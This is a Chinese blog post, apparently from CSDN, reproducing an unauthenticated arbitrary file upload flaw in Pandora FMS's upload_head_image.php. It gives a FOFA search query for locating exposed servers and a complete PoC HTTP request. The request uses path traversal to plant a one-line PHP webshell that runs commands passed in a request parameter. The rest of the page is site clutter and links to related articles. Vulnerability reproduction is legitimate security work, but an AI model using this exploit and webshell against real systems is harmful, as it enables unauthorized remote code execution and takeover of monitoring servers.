PandoraFMS 监控软件 任意文件上传漏洞复现

最新推荐文章于 2023-12-18 18:03:48 发布
最新推荐文章于 2023-12-18 18:03:48 发布
阅读量952 收藏 10
点赞数 13
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134890038
版权

0x01 产品简介

Pandora FMS 是用于监控计算机网络的软件。 Pandora FMS 允许以可视化方式监控来自不同操作系统、服务器、应用程序和硬件系统(例如防火墙、代理、数据库、Web 服务器或路由器)的多个参数的状态和性能。

0x02 漏洞概述

PandoraFMS upload_head_image.php 接口处存在未授权文件上传漏洞,攻击者可上传恶意木马获取服务器权限。

0x03 复现环境

FOFA:app="PANDORAFMS-产品"

0x04 漏洞复现

PoC

POST /pandora_console/enterprise/meta/general/upload_head_image.php?up=true HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Up-Filename: ../../../../../../../../../../var/www/html/pandora_console/extensions/rce.php
Accept-Encoding: gzip
Connection: close

<?php system($_REQUEST['c']); ?>

直接上传一句话

了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 13
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
pandorafms:Pandora FMS是一个灵活且高度可扩展的监视系统,适用于大型环境。 它使用代理(Linux,Windows,AIX,HP-UX,Solaris和BSD系统),并且可以进行本地和远程网络监视(SNMP v3,TCP检查,WMI等)。
02-03
Pandora FMS是用于IT基础架构管理的监视软件,其中包括网络设备,Windows和Unix服务器,虚拟基础架构以及所有不同类型的应用程序。 它具有大量功能,使其成为新一代软件,可以发现组织可能需要的所有监视问题。 支持 要获得社区支持,您可以访问我们的论坛,为 。 请访问我们的社区页面,为 ,如果您需要商业信息或/和专业支持,请访问 。 如何安装Pandora FMS 安装Pandora FMS是一项非常简单的任务。 请访问我们的Wiki,并按照描述的所有步骤进行快速正确的安装。 什么是Pandora FMS? Pandora FMS是一个监视应用程序,用于监视系统和应用程序,该应
Goby 漏洞发布|PandoraFMS 软件 upload_head_image.php 任意文件上传漏洞
m0_46699477的博客
06-21 290
PandoraFMS是美国PandoraFMS的一个应用软件。提供一个监控功能。PandoraFMS upload_head_image.php 存在未授权文件上传漏洞,攻击者可上传恶意木马获取服务器权限。
网站及监控利器 Pandora FMS使用体验
weixin_33943836的博客
03-20 145
 Pandora FMS 是一个 开源的应用程序 ,用来监测网站的各种活动,它可以收到实时的监测报告,并发送到你指定的邮箱,也可以通过e-mail, SMS 发送。               更多Linux下的监控软件请关注《Linux企业应用案例精解》一书...
网站监控系统 Pandora FMS
G.Q.F的专栏
08-13 598
Pandora FMS 是一个 开源的应用程序 ,用来监测网站的各种活动。 如果一个网站超额或当机,如果网站内容改变,硬盘或CPU被远程服务调用时(通过SNMP 或 TCP/IP),以及其它情况。 Pandora FMS 可以运行于任何操作系统, 获取数据并发送到服务器。 你可以收到实时的监测报告,并发送到你指定的邮箱。 它也可以通过e-mail, SMS 或 Jabber...
任意文件上传漏洞原理及上传利用案例(任意文件上传漏洞怎么解决)
最新发布
白帽黑客八哥的博客
12-18 1633
任意文件上传漏洞是一种Web应用程序中常见的安全漏洞,攻击者通过该漏洞可以上传恶意文件到服务器上。这可能导致多种安全问题,包括远程代码执行、服务器拒绝服务等。通常,攻击者通过构造特定的文件上传请求,绕过应用程序的文件类型验证和访问控制,成功上传具有恶意代码的文件。
Python库 | PandoraFMS_API-1.3.3-py3-none-any.whl
02-27
python库。 资源全名:PandoraFMS_API-1.3.3-py3-none-any.whl
Pandora FMS Event extension for Chrome-crx插件
04-03
Pandora FMS Event Viewer Chrome扩展 Pandora FMS Event Viewer Chrome扩展程序使操作员可以在使用他们的浏览器时随时了解情况,这是实时更新而不需要监视平台的理想方法。 即使他们不看屏幕,也可以通过声音发出...
K2P备用软件源PandoraBox潘多拉固件OpenWrt by Lean资源服务器
12-12
这个问题让我头疼很久,感谢服务器拥有者提供的备用软件源地址,新测可用,我用的固件是R7.4.1 By Lean
java pandora_Pandora FMS监视简介
cumj63710的博客
07-11 1514
java pandora Pandora灵活监控解决方案(FMS)是通用的监控软件,这意味着它可以控制网络设备,服务器(Linux和Windows),虚拟环境,应用程序,数据库等等。 它可以进行远程监视,也可以基于服务器上安装的代理进行监视。 您可以在报告和图形中获取收集的数据,并在出现问题时发出警报。 Pandora FMS提供两种版本: 开源社区版针对各种规模的私人用户和组织,并且功能齐...
fms安装教程 linux_如何借助Pandora FMS监控CentOS和Ubuntu服务器?
weixin_34369597的博客
02-06 527
引言Pandora FMS(Pandora灵活监控系统)是一款灵活、高度可扩展的监控软件,可以用来监控网络、服务器、应用程序和虚拟机等环境。Pandora FMS可以监控不同服务器操作系统和服务器应用系统(比如Web服务器、数据库和代理系统等)的状态及性能。Pandora FMS由服务器软件监控代理组成。我在本教程中将介绍如何将Pandora FMS Server安装到CentOS 7上,以及如...
HTB-Pandora
weixin_44193247的博客
10-01 2199
HTB_学习篇
在CentOS5/RHEL5上安装pandora fms
人勤阡陌绿
11-19 337
推荐一个服务器监控软件,完全免费的,叫Pandora FMS。刚开始用,还不太熟悉,今天先讲讲安装过程。 对网络,服务器监控软件感兴趣的,猛击[url=http://en.wikipedia.org/wiki/Network_monitoring_comparison]这里[/url]看看这篇比较各种监控软件的文章 项目的主页:[url]http://pandorafms.org[/url...
PandoraFMS 监控软件 SQL注入漏洞复现
0xSec
12-09 729
Pandora FMS监控软件存在SQL注入漏洞,攻击者通过chart_generator.php 来执行恶意语句,获取数据库敏感信息。
如何在Ubuntu 20.04中安装Pandora FMS监视工具
A5互联
10-30 688
Pandora FMS又称 “Pandora Flexible Monitoring System”,是一款用于服务器、网络、应用和虚拟基础设施的监控工具。它简单、可扩展,适用于复杂和较大的环境。它使用多种协议,包括TCP、UDP、SNMP、HTTP和代理来收集不同的指标。你可以使用Pandora FMS监控Web服务器、数据库服务器、应用程序、路由器和其他网络设备的状态和性能。 在本文中,我们将向介绍如何在香港服务器Ubuntu 20.04系统上安装和配置Pandora FMS。 先决条件 正常运行Ubu
7.23引以为戒 马后炮不如加强系统监控
chaos436的专栏
09-26 2110
原文地址:http://server.zol.com.cn/242/2422737_all.html#p2422737 马后炮不如加强系统监控   “7·23”甬温线特别重大铁路交通事故发生已经有十余天了,国务院事故调查组正在紧锣密鼓地
常见五大开源网络监控软件测评分析
dream_Kelly的博客
09-14 2405
  如何缩减成本是IT高管面临的永恒难题,确保企业中所有的东西满足服务水平协议对资源本就紧张的IT部门是极具挑战的。开源软件为企业节约成本带来了曙光,相较于更昂贵的商业产品,开源软件提供了极具吸引力的替代方案,但是开源产品可以提供企业级效果吗?   为了回答这个问题,我们测试了五个开源产品:OpenNMS、Pandora FMS、NetXMS、SugarNMS和Zabbix。这四个产品都有稳...
监控系统对比 Ganglia vs Open-falcon vs Prometheus vs Zabbix vs Nagios vs PandoraFMS
weixin_34356310的博客
11-17 1267
Zabbix vs Nagios vs PandoraFMS: an in depth comparison - Pandora FMS - The Monitoring Bloghttps://blog.pandorafms.org/zabbix-vs-nagios-vs-pandorafms-an-in-depth-comparison/ 开源监控系统对比(Ganglia、Open-falc...
Pandora FMS 部署详细步骤
04-25
- 打开 pandora_server.conf 文件(在 Pandora FMS 安装目录下)。 - 配置适当的参数(如 SNMP 和数据库连接)。 - 保存并退出该文件。 6.启动 Pandora FMS 完成以上所有步骤后,您需要启动 Pandora FMS。 - 通过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值